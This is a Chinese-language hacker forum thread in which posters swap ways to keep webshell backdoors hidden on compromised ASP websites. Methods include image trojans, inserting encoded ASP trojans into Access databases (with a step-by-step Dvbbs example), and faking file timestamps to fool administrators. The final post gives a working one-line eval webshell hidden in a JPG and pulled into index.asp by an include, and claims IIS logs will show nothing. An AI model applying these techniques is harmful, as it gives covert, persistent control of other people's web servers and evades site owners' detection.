[讨论]webshell下的后门讨论
目前比较流行的方法就是:1.图片木马,方法不多说了,大家都熟了。
2.向数据库里插入木马,或者往数据库里建个防下载表段,其中<%%>里面插入asp
木马
3.听linzi说的,把asp木马拿去加密,然后插入数据库里。
但是我试了几次都失败,加密的读不出来,我用的是Escape和Encode加密。
问问大家用什么方法,以及上面的我失败的原因,帮忙分析一下。 转去suggestions吧
以前在CSDN好象看过关于加密asp文件后无法访问解决办法的文章...但是....是无意中看的,具体内容忘了.... 这个贴子为什么不发在Suggestions版面???
Access数据库插入后门,这里以动网的为例。
思路是:因为动网里面有<%等比较特别的字符。
所以先用这个FtoF.exe处理一下,这样再插入你要插入的后门就不会出现问题了。
1.如果数据库为1.asp的话,[注意:碰到长文件名的时候请转换成短文件名]
使用方法:C:\notdown.exe c:\TC\1.asp c:\TC\2.asp
处理后的数据库就是2.asp
2然后用2.asp覆盖1.asp数据库,
[建议把1.asp备份一下,以免出现意外,其实我可以跟上面一步合并的,但是考虑到数据的安全性,所以多了这么一步]
copy
3.把dbINbd.asp上传上去,执行一下,就可以了。
然后你可以测试一下,冰狐的后门插入到数据库的执行效果了。。
动画地址:[url]http://www1.hackbase.com/down/62/20050110/5956.htm[/url] 我测试过了,在用screnc.exe对asp木马进行encoe后的代码完全可以运行的.至于你为什么不能运行,我估计是不是对方的脚本引擎的版本问题.这个是我臆测的,没有去验证,呵呵~~~
至于用escape/unescape方法那就更没问题了.不知道漏主兄弟是什么样的错误提示呢... 我怀疑 你是不是没用对?
Escape和Encode加密不是直接把页转换成密文就可以直接帖的
需要适当的语句来辅助插入 否则 浏览器是无法认出这些代码的
[url]http://www.eviloctal.com/tools/script.htm[/url]
[url]http://www.eviloctal.com/tools/encoder.htm[/url] 其实改时间是最重要的
很多管理员都是通过时间来搜索的 [quote]引用第2楼恶猫于2005-01-22 01:27发表的 :
这个贴子为什么不发在Suggestions版面???
Access数据库插入后门,这里以动网的为例。
思路是:因为动网里面有<%等比较特别的字符。
.......[/quote]
我想知道FtoF.exe实现的原理,或者提供下源代码看看。 好站一般不留任何东西,执行完任务后del..
但是会把整站down下来.... [s:265] 其实没必要弄的那么复杂,管理员又不是神。。。。
给ASP文件里插下马,修改下时间几乎就OK [quote]引用第8楼xiaozei于2007-06-20 01:45发表的 :
其实没必要弄的那么复杂,管理员又不是神。。。。
给ASP文件里插下马,修改下时间几乎就OK[/quote]
这样好像很容易搜索到eval等语句那 隐蔽性很差吧? 看了上面的讨论
我觉得这样是一个不错的方法:
1.写一个pic.jpg,内容是
[code]<%EvAl reqUest("#")%>[/code]注意大小写.
当然有必要的话,你可以在一张真实的图片的末尾加入一句话木马,这样文件的大小也很正常。
2.在比如说index.asp,search.asp里面插入
<!--#include file=pic.jpg -->
最好插在中间位置.
3,把两个文件的时间改一下。
这样要我做网管 肯定是查不出来了。
IIS日志也是一切正常!哈哈[s:269]
页:
[1]